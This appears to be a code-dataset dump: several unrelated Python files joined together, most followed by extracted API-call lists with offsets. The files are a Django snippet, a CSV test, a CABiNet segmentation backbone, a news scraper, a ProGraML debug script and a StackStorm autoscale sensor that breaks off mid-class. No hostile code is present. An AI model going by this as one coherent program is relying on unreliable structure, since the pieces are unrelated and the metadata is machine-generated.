# Make document comments searchable from the document-level search as well.
document_search.add_model_field(
    field='comments__comment',
    label=_('Comments')
)
| [
"django.utils.translation.ugettext_lazy"
] | [((243, 256), 'django.utils.translation.ugettext_lazy', '_', (['"""Comments"""'], {}), "('Comments')\n", (244, 256), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((333, 346), 'django.utils.translation.ugettext_lazy', '_', (['"""Comments"""'], {}), "('Comments')\n", (334, 346), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
import unittest
import csv_functions
class TestCsvFunctions(unittest.TestCase):
    """Tests for csv_functions.csv_open against the bundled fixture files."""
    def test_open_test_file(self):
        # (fixture file, expected rows); test_2 is test_1 with doubled Y values.
        cases = [
            ('test_1.csv',
             [['X', 'Y'], ['0', '0'], ['1', '10'], ['2', '15'], ['3', '50'],
              ['4', '80'], ['5', '100'], ['6', '80'], ['7', '45'], ['8', '35'],
              ['9', '15'], ['10', '5']]),
            ('test_2.csv',
             [['X', 'Y'], ['0', '0'], ['1', '20'], ['2', '30'], ['3', '100'],
              ['4', '160'], ['5', '200'], ['6', '160'], ['7', '90'], ['8', '70'],
              ['9', '30'], ['10', '10']]),
        ]
        for filename, expected in cases:
            self.assertEqual(expected, csv_functions.csv_open(filename))
| [
"csv_functions.csv_open"
] | [((332, 368), 'csv_functions.csv_open', 'csv_functions.csv_open', (['"""test_1.csv"""'], {}), "('test_1.csv')\n", (354, 368), False, 'import csv_functions\n'), ((632, 668), 'csv_functions.csv_open', 'csv_functions.csv_open', (['"""test_2.csv"""'], {}), "('test_2.csv')\n", (654, 668), False, 'import csv_functions\n')] |
# Copyright (c) 2020. Huawei Technologies Co., Ltd.
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (c) 2019 MendelXu
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init
from mmcv.runner import load_checkpoint
from mmcv.utils.parrots_wrapper import _BatchNorm
from mmseg.utils import get_root_logger
from mmseg.models.utils import LocalAttentionModule, PSPModule
from ..builder import BACKBONES
from .mobilenet_v3 import MobileNetV3
class SpatialBranch(nn.Module):
    """Spatial (detail) branch of CABiNet.
    Downsamples the input by 8x: a stride-2 7x7 stem conv followed by two
    stride-2 depthwise-separable 3x3 convs, then a 1x1 projection.
    Args:
        in_channels (int): Channels of the input image.
        stem_channels (int): Width of the intermediate conv layers.
        out_channels (int): Channels of the output feature map.
        conv_cfg (dict | None): mmcv conv layer config.
        norm_cfg (dict): mmcv normalization config (default: BN).
    """
    def __init__(self,
                 in_channels,
                 stem_channels,
                 out_channels,
                 conv_cfg=None,
                 norm_cfg=dict(type='BN')):
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        # Stem: 7x7 stride-2 conv -> 1/2 resolution.
        self.conv1 = ConvModule(
            in_channels=in_channels,
            out_channels=stem_channels,
            kernel_size=7,
            stride=2,
            padding=3,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
        # Two further stride-2 depthwise-separable convs -> 1/8 overall.
        self.conv2 = DepthwiseSeparableConvModule(
            in_channels=stem_channels,
            out_channels=stem_channels,
            kernel_size=3,
            stride=2,
            padding=1,
            norm_cfg=norm_cfg,
            act_cfg=dict(type='ReLU'),
            dw_act_cfg=None,
            pw_act_cfg=dict(type='ReLU')
        )
        self.conv3 = DepthwiseSeparableConvModule(
            in_channels=stem_channels,
            out_channels=stem_channels,
            kernel_size=3,
            stride=2,
            padding=1,
            norm_cfg=norm_cfg,
            act_cfg=dict(type='ReLU'),
            dw_act_cfg=None,
            pw_act_cfg=dict(type='ReLU')
        )
        # 1x1 projection to the requested output width.
        self.conv_out = ConvModule(
            in_channels=stem_channels,
            out_channels=out_channels,
            kernel_size=1,
            stride=1,
            padding=0,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
    def forward(self, x):
        """Run the 8x-downsampling spatial branch."""
        y = self.conv1(x)
        y = self.conv2(y)
        y = self.conv3(y)
        out = self.conv_out(y)
        return out
class GhostModule(nn.Module):
    """Ghost convolution: a cheap way to produce more feature maps.
    A primary conv generates ``out_channels / ratio`` maps; a depthwise
    "cheap operation" derives the remaining maps from them; both are
    concatenated and trimmed to ``out_channels``.
    Reference:
        https://github.com/huawei-noah/CV-Backbones/blob/master/ghostnet_pytorch/ghostnet.py
    License: https://github.com/huawei-noah/CV-Backbones/blob/master/ghostnet_pytorch/License.txt
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size=1,
                 ratio=2,
                 dw_size=3,
                 stride=1,
                 conv_cfg=None,
                 norm_cfg=dict(type='BN')):
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        # Channels produced by the primary conv vs. the cheap depthwise conv.
        init_channels = math.ceil(out_channels / ratio)
        new_channels = init_channels * (ratio - 1)
        self.primary_conv = ConvModule(
            in_channels=self.in_channels,
            out_channels=init_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=kernel_size // 2,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
        # Depthwise conv (groups=init_channels) producing the "ghost" maps.
        self.cheap_operation = ConvModule(
            in_channels=init_channels,
            out_channels=new_channels,
            kernel_size=dw_size,
            stride=1,
            padding=dw_size // 2,
            groups=init_channels,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
    def forward(self, x):
        """Concatenate primary and ghost features, trimmed to out_channels."""
        x1 = self.primary_conv(x)
        x2 = self.cheap_operation(x1)
        out = torch.cat([x1, x2], dim=1)
        # ceil() above may overshoot by one map; trim to the exact width.
        out = out[:, :self.out_channels, :, :]
        return out
class CAPAttentionModule(nn.Module):
    """Context-aggregation attention with pyramid-pooled keys/values.
    Keys and values are compressed by PSPModule pooling so the attention
    matrix is (H*W) x sum(s*s for s in psp_size) instead of (H*W) x (H*W).
    Reference: https://github.com/MendelXu/ANN
    """
    def __init__(self,
                 num_channels,
                 key_channels,
                 psp_size=(1, 3, 6, 8),
                 conv_cfg=None,
                 norm_cfg=dict(type='BN')):
        super().__init__()
        self.num_channels = num_channels
        self.key_channels = key_channels
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        # 1x1 projection of the full-resolution feature map to key_channels.
        self.query = ConvModule(
            in_channels=self.num_channels,
            out_channels=self.key_channels,
            kernel_size=1,
            stride=1,
            padding=0,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
        # Ghost projection + pyramid pooling: compact key/value sequences.
        self.key = nn.Sequential(
            GhostModule(self.num_channels, self.key_channels, conv_cfg=self.conv_cfg, norm_cfg=self.norm_cfg),
            PSPModule(psp_size)
        )
        self.value = nn.Sequential(
            GhostModule(self.num_channels, self.num_channels, conv_cfg=self.conv_cfg, norm_cfg=self.norm_cfg),
            PSPModule(psp_size)
        )
    def forward(self, x):
        """Scaled dot-product attention over pooled keys, residual-added to x."""
        batch_size, h, w = x.size(0), x.size(2), x.size(3)
        # key: (B, key_channels, S); value -> (B, S, num_channels), where S is
        # the total number of pooled positions produced by PSPModule.
        key = self.key(x)
        value = self.value(x).permute(0, 2, 1)
        # query: (B, H*W, key_channels)
        query = self.query(x).view(batch_size, self.key_channels, -1).permute(0, 2, 1)
        sim_map = torch.matmul(query, key)
        # Standard 1/sqrt(d_k) scaling before the softmax.
        sim_map = (self.key_channels ** -0.5) * sim_map
        sim_map = F.softmax(sim_map, dim=-1)
        context = torch.matmul(sim_map, value)
        context = context.permute(0, 2, 1).contiguous()
        context = context.view(batch_size, self.num_channels, *x.size()[2:])
        # Residual connection.
        out = x + context
        return out
class ContextBranch(nn.Module):
    """Context branch of CABiNet.
    A MobileNetV3-small backbone (576-channel stage 12 output) followed by
    the context-aggregation block (CAP attention + local attention) and a
    1x1 projection down to 128 channels.
    Args:
        in_channels (int): Must be 3 (RGB input to MobileNetV3).
        out_channels (int): Kept for interface symmetry; NOTE(review): the
            projection below is hard-coded to 128 and ignores this value.
        conv_cfg (dict | None): mmcv conv layer config.
        norm_cfg (dict): mmcv normalization config (default: BN).
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 conv_cfg=None,
                 norm_cfg=dict(type='BN')):
        super().__init__()
        self.in_channels = in_channels
        assert self.in_channels == 3
        self.out_channels = out_channels
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        self.backbone = MobileNetV3(
            arch='small',
            out_indices=(12,),
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
        )
        # Context Aggregation Block: global (CAP) then local attention.
        self.cab = nn.Sequential(
            CAPAttentionModule(
                num_channels=576,
                key_channels=128,
                conv_cfg=self.conv_cfg,
                norm_cfg=self.norm_cfg
            ),
            LocalAttentionModule(
                num_channels=576,
                conv_cfg=self.conv_cfg,
                norm_cfg=self.norm_cfg
            )
        )
        self.conv_out = ConvModule(
            in_channels=576,
            out_channels=128,
            kernel_size=1,
            stride=1,
            padding=0,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
    def forward(self, x):
        """Backbone -> context aggregation -> 1x1 projection."""
        y = self.backbone(x)[0]
        y = self.cab(y)
        out = self.conv_out(y)
        return out
class FeatureFusionModule(nn.Module):
    """Fuse the spatial and context branch outputs.
    The context features are upsampled to the spatial resolution,
    concatenated, mixed, and re-weighted by a squeeze-excitation style
    channel attention before a final 1x1 conv.
    Args:
        in_channels (int): Channels of the concatenated input (spatial + context).
        out_channels (int): Channels of the fused output.
        conv_cfg (dict | None): mmcv conv layer config.
        norm_cfg (dict): mmcv normalization config (default: BN).
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 conv_cfg=None,
                 norm_cfg=dict(type='BN')):
        super(FeatureFusionModule, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        # 1x1 conv mixing the concatenated branches.
        self.conv_mix = ConvModule(
            in_channels=self.in_channels,
            out_channels=self.out_channels,
            kernel_size=1,
            stride=1,
            padding=0,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
        self.conv_sep = DepthwiseSeparableConvModule(
            in_channels=self.out_channels,
            out_channels=self.out_channels,
            kernel_size=3,
            stride=1,
            padding=1,
            norm_cfg=norm_cfg,
            act_cfg=dict(type='ReLU'),
            dw_act_cfg=None,
            pw_act_cfg=dict(type='ReLU')
        )
        # Squeeze-excitation channel attention (reduction 4, sigmoid gate).
        self.attention = nn.Sequential(
            nn.AdaptiveAvgPool2d((1, 1)),
            ConvModule(
                in_channels=self.out_channels,
                out_channels=self.out_channels // 4,
                kernel_size=1,
                stride=1,
                padding=0,
                conv_cfg=self.conv_cfg,
                norm_cfg=self.norm_cfg,
                act_cfg=dict(type='ReLU')
            ),
            ConvModule(
                in_channels=self.out_channels // 4,
                out_channels=self.out_channels,
                kernel_size=1,
                stride=1,
                padding=0,
                conv_cfg=self.conv_cfg,
                norm_cfg=self.norm_cfg,
                act_cfg=None
            ),
            nn.Sigmoid()
        )
        self.conv_out = ConvModule(
            in_channels=self.out_channels,
            out_channels=self.out_channels,
            kernel_size=1,
            stride=1,
            padding=0,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg,
            act_cfg=dict(type='ReLU')
        )
    def forward(self, fsp, fcp):
        """Fuse spatial (fsp) and context (fcp) features.
        fcp is bilinearly upsampled to fsp's spatial size first.
        """
        _, _, h, w = fsp.size()
        fcp = F.interpolate(fcp, size=(h, w), mode='bilinear', align_corners=True)
        y = torch.cat([fsp, fcp], dim=1)
        y = self.conv_mix(y)
        y = self.conv_sep(y)
        # Residual re-weighting: y * (1 + attention(y)).
        mask = self.attention(y)
        y = y + mask * y
        out = self.conv_out(y)
        return out
@BACKBONES.register_module()
class CABiNet(nn.Module):
    """CABiNet backbone.

    `Efficient Context Aggregation Network for Low-Latency Semantic Segmentation
    <http://essay.utwente.nl/84370/1/84370_Sasena_Thesis.pdf>`_

    Two parallel branches (spatial and context) are fused by a
    FeatureFusionModule; ``forward`` returns all three feature maps.
    """
    def __init__(self,
                 extra,
                 in_channels=3,
                 conv_cfg=None,
                 norm_cfg=dict(type='BN'),
                 norm_eval=False):
        # `extra` is the backbone-specific config dict kept for the builder API.
        super().__init__()
        self.extra = extra
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        # When True, BatchNorm layers are kept in eval mode during training.
        self.norm_eval = norm_eval
        self.spatial_branch = SpatialBranch(
            in_channels=in_channels,
            stem_channels=64,
            out_channels=128,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg
        )
        self.context_branch = ContextBranch(
            in_channels=in_channels,
            out_channels=128,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg
        )
        # Fuses the two 128-channel branch outputs (256 channels concatenated).
        self.ffm = FeatureFusionModule(
            in_channels=256,
            out_channels=128,
            conv_cfg=self.conv_cfg,
            norm_cfg=self.norm_cfg
        )
    def init_weights(self, pretrained=None):
        """Initialize the weights in backbone.

        Args:
            pretrained (str, optional): Path to pre-trained weights.
                Defaults to None.
        """
        if isinstance(pretrained, str):
            logger = get_root_logger()
            load_checkpoint(self, pretrained, strict=False, logger=logger)
        elif pretrained is None:
            # No checkpoint: normal-init convolutions, constant-init BN scales.
            for m in self.modules():
                if isinstance(m, nn.Conv2d):
                    normal_init(m, std=0.001)
                elif isinstance(m, _BatchNorm):
                    constant_init(m, 1)
        else:
            raise TypeError('pretrained must be a str or None')
    def forward(self, x):
        """Forward function.

        Returns:
            list[Tensor]: ``[spatial, context, fused]`` feature maps.
        """
        spatial = self.spatial_branch(x)
        context = self.context_branch(x)
        fused = self.ffm(spatial, context)
        y_list = [spatial, context, fused]
        return y_list
    def train(self, mode=True):
        """Convert the model into training mode.

        Keeps BatchNorm layers frozen (eval mode) when ``norm_eval`` is set.
        """
        super().train(mode)
        if mode and self.norm_eval:
            for m in self.modules():
                if isinstance(m, _BatchNorm):
                    m.eval()
| [
"torch.nn.Sigmoid",
"math.ceil",
"mmseg.utils.get_root_logger",
"mmcv.cnn.ConvModule",
"mmcv.cnn.normal_init",
"torch.matmul",
"mmseg.models.utils.PSPModule",
"torch.nn.functional.interpolate",
"torch.nn.AdaptiveAvgPool2d",
"mmcv.runner.load_checkpoint",
"mmseg.models.utils.LocalAttentionModule"... | [((3264, 3295), 'math.ceil', 'math.ceil', (['(out_channels / ratio)'], {}), '(out_channels / ratio)\n', (3273, 3295), False, 'import math\n'), ((4170, 4196), 'torch.cat', 'torch.cat', (['[x1, x2]'], {'dim': '(1)'}), '([x1, x2], dim=1)\n', (4179, 4196), False, 'import torch\n'), ((5694, 5718), 'torch.matmul', 'torch.matmul', (['query', 'key'], {}), '(query, key)\n', (5706, 5718), False, 'import torch\n'), ((5793, 5819), 'torch.nn.functional.softmax', 'F.softmax', (['sim_map'], {'dim': '(-1)'}), '(sim_map, dim=-1)\n', (5802, 5819), True, 'import torch.nn.functional as F\n'), ((5839, 5867), 'torch.matmul', 'torch.matmul', (['sim_map', 'value'], {}), '(sim_map, value)\n', (5851, 5867), False, 'import torch\n'), ((9718, 9786), 'torch.nn.functional.interpolate', 'F.interpolate', (['fcp'], {'size': '(h, w)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(fcp, size=(h, w), mode='bilinear', align_corners=True)\n", (9731, 9786), True, 'import torch.nn.functional as F\n'), ((9800, 9828), 'torch.cat', 'torch.cat', (['[fsp, fcp]'], {'dim': '(1)'}), '([fsp, fcp], dim=1)\n', (9809, 9828), False, 'import torch\n'), ((5209, 5228), 'mmseg.models.utils.PSPModule', 'PSPModule', (['psp_size'], {}), '(psp_size)\n', (5218, 5228), False, 'from mmseg.models.utils import LocalAttentionModule, PSPModule\n'), ((5398, 5417), 'mmseg.models.utils.PSPModule', 'PSPModule', (['psp_size'], {}), '(psp_size)\n', (5407, 5417), False, 'from mmseg.models.utils import LocalAttentionModule, PSPModule\n'), ((6871, 6962), 'mmseg.models.utils.LocalAttentionModule', 'LocalAttentionModule', ([], {'num_channels': '(576)', 'conv_cfg': 'self.conv_cfg', 'norm_cfg': 'self.norm_cfg'}), '(num_channels=576, conv_cfg=self.conv_cfg, norm_cfg=\n self.norm_cfg)\n', (6891, 6962), False, 'from mmseg.models.utils import LocalAttentionModule, PSPModule\n'), ((8581, 8609), 'torch.nn.AdaptiveAvgPool2d', 'nn.AdaptiveAvgPool2d', (['(1, 1)'], {}), '((1, 1))\n', (8601, 8609), 
True, 'import torch.nn as nn\n'), ((8968, 9154), 'mmcv.cnn.ConvModule', 'ConvModule', ([], {'in_channels': '(self.out_channels // 4)', 'out_channels': 'self.out_channels', 'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'conv_cfg': 'self.conv_cfg', 'norm_cfg': 'self.norm_cfg', 'act_cfg': 'None'}), '(in_channels=self.out_channels // 4, out_channels=self.\n out_channels, kernel_size=1, stride=1, padding=0, conv_cfg=self.\n conv_cfg, norm_cfg=self.norm_cfg, act_cfg=None)\n', (8978, 9154), False, 'from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init\n'), ((9300, 9312), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (9310, 9312), True, 'import torch.nn as nn\n'), ((11462, 11479), 'mmseg.utils.get_root_logger', 'get_root_logger', ([], {}), '()\n', (11477, 11479), False, 'from mmseg.utils import get_root_logger\n'), ((11492, 11554), 'mmcv.runner.load_checkpoint', 'load_checkpoint', (['self', 'pretrained'], {'strict': '(False)', 'logger': 'logger'}), '(self, pretrained, strict=False, logger=logger)\n', (11507, 11554), False, 'from mmcv.runner import load_checkpoint\n'), ((11690, 11715), 'mmcv.cnn.normal_init', 'normal_init', (['m'], {'std': '(0.001)'}), '(m, std=0.001)\n', (11701, 11715), False, 'from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init\n'), ((11784, 11803), 'mmcv.cnn.constant_init', 'constant_init', (['m', '(1)'], {}), '(m, 1)\n', (11797, 11803), False, 'from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init\n')] |
import pandas as pd
import re
import requests
from bs4 import BeautifulSoup
from time import sleep
from .requester import Requester
class Crawler:
    """Crawl a paginated news site and collect [label, link, title, text] rows.

    Workflow: :meth:`set_requests` discovers and fetches every page URL,
    :meth:`set_data` (via :meth:`get_raw_data`) extracts per-article fields
    from the fetched pages, and :meth:`get_data` returns the collected rows.
    """
    def __init__(self, url, sarcasm, as_archived=False):
        # Base URL; pages are addressed either by suffixing a page number or,
        # for "archived" sites, via per-archive links found on the first page.
        self.__url = url
        # Label stored in the first column of every collected row.
        self.__sarcasm = sarcasm
        self.__as_archived = as_archived
        self.__data = list()
        self.__requests = list()
    def set_requests(self, html_class, regex, remove, element="a", shorter=0):
        """Discover every page URL of the site and fetch them all.

        For a numbered site the last page number is read from the pagination
        widget of page 1 and URLs for pages 1..last are generated.  For an
        archived site (``as_archived=True``) the archive links themselves
        (e.g. one per year) are scraped from the landing page instead.

        :param html_class: class of the element holding the page links.
        :param regex: raw regular expression locating the page number / link.
        :param remove: ``(start, end)`` character counts stripped from each
            regex match.
        :param element: HTML tag searched for ``html_class`` (default "a").
        :param shorter: archived sites only -- how many trailing characters
            to drop from the base URL before appending each archive link.
        """
        find_pages = re.compile(regex)
        urls = list()
        # Numbered sites need page "1" appended to reach the first page.
        html = Requester.get_one_request(self.__url + ("1", "")[self.__as_archived], force=True)
        bs = BeautifulSoup(html.text, "html.parser")
        element = str(bs.find_all(element, class_=html_class))
        if self.__as_archived == True:
            for page in find_pages.finditer(element):
                urls.append(str(self.__url[:-shorter]) + element[page.start()+remove[0]:page.end()-remove[1]])
        else:
            # The last match is the highest page number; +1 for range().
            for page in find_pages.finditer(element):
                pages = int(element[page.start()+remove[0]:page.end()-remove[1]]) + 1
            for page in range(1, pages):
                urls.append(self.__url + str(page))
        self.__requests = Requester(urls, num_threads=24).get_requests()
    def get_raw_data(self, html_class, regex, element="div"):
        """Extract raw HTML fragments (one per article) from the fetched pages.

        :param html_class: class of the container element to search for.
        :param regex: raw regular expression selecting each article fragment
            from the stringified container list.
        :param element: HTML tag of the container (default "div").
        :return: list of raw HTML substrings, one per matched article.
        """
        find_element = re.compile(regex)
        raw_data = list()
        for request in self.__requests:
            bs = BeautifulSoup(request.text, "html.parser")
            raw = str(bs.find_all(element, class_=html_class))
            for text in find_element.finditer(raw):
                raw_data.append(raw[text.start():text.end()])
        print("[+] Total of {0:04d} raw data collected".format(len(raw_data)))
        return raw_data
    def set_data(self, raw_args, regex, remove, html_options, url_prefix=0):
        """Populate the internal dataset with [label, link, title, text] rows.

        :param raw_args: keyword arguments forwarded to :meth:`get_raw_data`.
        :param regex: pair of raw regular expressions ``(link_re, title_re)``.
        :param remove: pair of ``(start, end)`` trim counts, one per regex.
        :param html_options: ``(tag, attrs)`` used by the currently disabled
            article-text download below.
        :param url_prefix: number of leading characters of the base URL to
            prepend to each relative link.
        """
        find_link = re.compile(regex[0])
        find_title = re.compile(regex[1])
        find_text = re.compile(r"<.*?>")
        # find_text = re.compile(r"<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});")
        urls = list()
        for raw in self.get_raw_data(**raw_args):
            data = [None,None,None,None]
            data[0] = self.__sarcasm
            for tmp in find_link.finditer(raw):
                data[1] = self.__url[:url_prefix] + raw[tmp.start()+remove[0][0]:tmp.end()-remove[0][1]]
                urls.append(data[1])
            for tmp in find_title.finditer(raw):
                data[2] = raw[tmp.start()+remove[1][0]:tmp.end()-remove[1][1]]
            # NOTE(review): data[2] is a str, so it can never equal the list
            # [""]; this guard looks intended to skip empty titles -- confirm.
            if data[2] == [""]:
                continue
            data[3] = ""
            self.__data.append(data)
        # progress = 0
        # requests = Requester(urls, num_threads = 64).get_requests()
        # print("[+] {0:03d}/{1:03d} data crawled".format(progress,len(requests)), end='\r')
        # for request in requests:
        #     if request.url != urls[progress]:
        #         progress += 1
        #         continue
        #     bs = BeautifulSoup(request.text, "html.parser")
        #     text = str(bs.find_all(html_options[0], html_options[1]))
        #     bs = BeautifulSoup(text, "html.parser")
        #     text = str(bs.find_all("p"))
        #     indexs = list()
        #     for t in find_text.finditer(text):
        #         indexs.append([t.start(),t.end()])
        #     indexs.reverse()
        #     text = list(text)
        #     for i in indexs:
        #         for r in range(i[1], i[0]-1, -1):
        #             text[r] = ''
        #     self.__data[progress][3] = ''.join(text)
        #     progress += 1
        #     print("[+] {0:03d}/{1:03d} data crawled".format(progress,len(requests)), end='\r')
        # print()
        print("[+] Dataframe completed")
    def get_data(self):
        """Return the collected rows as a list of [label, link, title, text]."""
        return self.__data
"bs4.BeautifulSoup",
"re.compile"
] | [((1341, 1358), 're.compile', 're.compile', (['regex'], {}), '(regex)\n', (1351, 1358), False, 'import re\n'), ((1474, 1513), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html.text', '"""html.parser"""'], {}), "(html.text, 'html.parser')\n", (1487, 1513), False, 'from bs4 import BeautifulSoup\n'), ((2391, 2408), 're.compile', 're.compile', (['regex'], {}), '(regex)\n', (2401, 2408), False, 'import re\n'), ((3794, 3814), 're.compile', 're.compile', (['regex[0]'], {}), '(regex[0])\n', (3804, 3814), False, 'import re\n'), ((3830, 3850), 're.compile', 're.compile', (['regex[1]'], {}), '(regex[1])\n', (3840, 3850), False, 'import re\n'), ((3865, 3884), 're.compile', 're.compile', (['"""<.*?>"""'], {}), "('<.*?>')\n", (3875, 3884), False, 'import re\n'), ((2472, 2514), 'bs4.BeautifulSoup', 'BeautifulSoup', (['request.text', '"""html.parser"""'], {}), "(request.text, 'html.parser')\n", (2485, 2514), False, 'from bs4 import BeautifulSoup\n')] |
from pathlib import Path
import pickle
import time, os, json, sys
import numpy as np
#from matplotlib import pyplot as plt
import networkx as nx
#import tqdm
#import torch
#from torch_geometric.data import Data, DataLoader, InMemoryDataset
#import torch_geometric
# Debug script: build the ProGraML graph of one .ll file with two builder
# configurations and check that repeated builds are node-for-node identical.
# make this file executable from anywhere
#if __name__ == '__main__':
full_path = os.path.realpath(__file__)
print(full_path)
# Locate the repository root so in-repo imports resolve from anywhere.
repo_root = full_path.rsplit('ProGraML', maxsplit=1)[0] + 'ProGraML'
print(repo_root)
#insert at 1, 0 is the script path (or '' in REPL)
sys.path.insert(1, repo_root)
repo_root = Path(repo_root)
# Import after the sys.path hack so the in-repo package is found.
from deeplearning.ml4pl.graphs.unlabelled.llvm2graph import graph_builder
builder = graph_builder.ProGraMLGraphBuilder() #opt='/usr/bin/opt')
builder7 = graph_builder.ProGraMLGraphBuilder(opt='/usr/bin/opt')
file_to_debug = '/mnt/data/llvm/master_thesis_datasets/unsupervised_ncc_data/amd_app_sdk/amd/AtomicCounters.ll'
#with open('/mnt/data/llvm/master_thesis_datasets/unsupervised_ncc_data/amd_app_sdk/amd_ocl/AMDAPPSDK-3.0_samples_bolt_BoxFilterSAT_BoxFilterSAT_Kernels.ll', 'r') as f:
#with open('/mnt/data/llvm/master_thesis_datasets/unsupervised_ncc_data/eigen/eigen_matmul_3/eigen_matmul-266.ll_', 'r') as f:
#with open(repo_root / 'deeplearning/ml4pl/poj104' / '71.ll', 'r') as f:
with open(file_to_debug, 'r') as f:
    ll = f.read()
nx_graph = builder.Build(ll)
nx_graph7 = builder7.Build(ll)
for i in range(5):
    # Rebuild from scratch each round to probe for non-determinism.
    nn = builder.Build(ll)
    print(f"====== {i} =====")
    for n, d in nn.nodes.items():
        print(n, d)
        if 15 >= n and n > 14:
            pass
    print('\n\n\n\n')
    # Scratch lists; unused in the active code below.
    di = []
    ddi = []
    # Every node of the fresh build must have an identical node in the
    # reference graph built above.
    for n, d in nn.nodes.items():
        match = None
        is_ok = False
        # NOTE(review): this loop rebinds `nn` (the freshly built graph) to a
        # node id of the reference graph -- harmless here because the outer
        # iterator is already created, but worth renaming.
        for nn, dd in nx_graph.nodes.items():
            if d == dd:
                #if is_ok:
                #    assert False, f'double match: {match}, double: {nn, dd}'
                is_ok = True
                match = [n, d, nn, dd]
        assert is_ok, f"is not okay! {n} and data {d}"
print('done')
| [
"os.path.realpath",
"sys.path.insert",
"deeplearning.ml4pl.graphs.unlabelled.llvm2graph.graph_builder.ProGraMLGraphBuilder",
"pathlib.Path"
] | [((351, 377), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (367, 377), False, 'import time, os, json, sys\n'), ((532, 561), 'sys.path.insert', 'sys.path.insert', (['(1)', 'repo_root'], {}), '(1, repo_root)\n', (547, 561), False, 'import time, os, json, sys\n'), ((574, 589), 'pathlib.Path', 'Path', (['repo_root'], {}), '(repo_root)\n', (578, 589), False, 'from pathlib import Path\n'), ((677, 713), 'deeplearning.ml4pl.graphs.unlabelled.llvm2graph.graph_builder.ProGraMLGraphBuilder', 'graph_builder.ProGraMLGraphBuilder', ([], {}), '()\n', (711, 713), False, 'from deeplearning.ml4pl.graphs.unlabelled.llvm2graph import graph_builder\n'), ((746, 800), 'deeplearning.ml4pl.graphs.unlabelled.llvm2graph.graph_builder.ProGraMLGraphBuilder', 'graph_builder.ProGraMLGraphBuilder', ([], {'opt': '"""/usr/bin/opt"""'}), "(opt='/usr/bin/opt')\n", (780, 800), False, 'from deeplearning.ml4pl.graphs.unlabelled.llvm2graph import graph_builder\n')] |
import time
import eventlet
import ast
from st2reactor.sensor.base import PollingSensor
# Public export list.  NOTE: this was originally spelled `__all_`, which
# Python ignores; fixed so `from <module> import *` exports only the sensor.
__all__ = [
    'AutoscaleGovernorSensor'
]

eventlet.monkey_patch(
    os=True,
    select=True,
    socket=True,
    thread=True,
    time=True)

# Datastore status values meaning a scale operation is already in flight.
GROUP_ACTIVE_STATUS = [
    'expanding',
    'deflating'
]
class AutoscaleGovernorSensor(PollingSensor):
    """Periodically inspects autoscale-group (ASG) keys in the datastore and
    dispatches scale-up / scale-down pulse triggers for eligible groups.

    A group scales up while it has an active incident, down while it does
    not -- subject to its min/max node bounds and a per-direction cool-down.
    """

    def __init__(self, sensor_service, config=None, poll_interval=60):
        super(AutoscaleGovernorSensor, self).__init__(sensor_service=sensor_service,
                                                      config=config,
                                                      poll_interval=poll_interval)
        self._logger = self._sensor_service.get_logger(__name__)
        self._kvp_get = self._sensor_service.get_value
        # Trigger type dispatched for each scaling direction.
        self._trigger = {
            'expand': 'autoscale.ScaleUpPulse',
            'deflate': 'autoscale.ScaleDownPulse'
        }
        # Node-count bound that constrains each direction.
        self._bound = {
            'expand': 'max',
            'deflate': 'min'
        }

    def setup(self):
        pass

    def poll(self):
        """Partition ASGs into alerting/stable and process each accordingly."""
        alerting_asgs = []
        stable_asgs = []
        # Get all the ASG related keys in the Key Store.
        kvps = self._sensor_service.list_values(local=False, prefix='asg.')
        # Key names look like "asg.<name>.active_incident" with a boolean value.
        for kvp in kvps:
            if 'active_incident' in kvp.name:
                asg = kvp.name.split('.')[1]
                if ast.literal_eval(kvp.value):
                    alerting_asgs.append(asg)
                else:
                    stable_asgs.append(asg)
        # Alerting groups may need to scale up...
        for asg in alerting_asgs:
            self._process_asg(asg, 'expand')
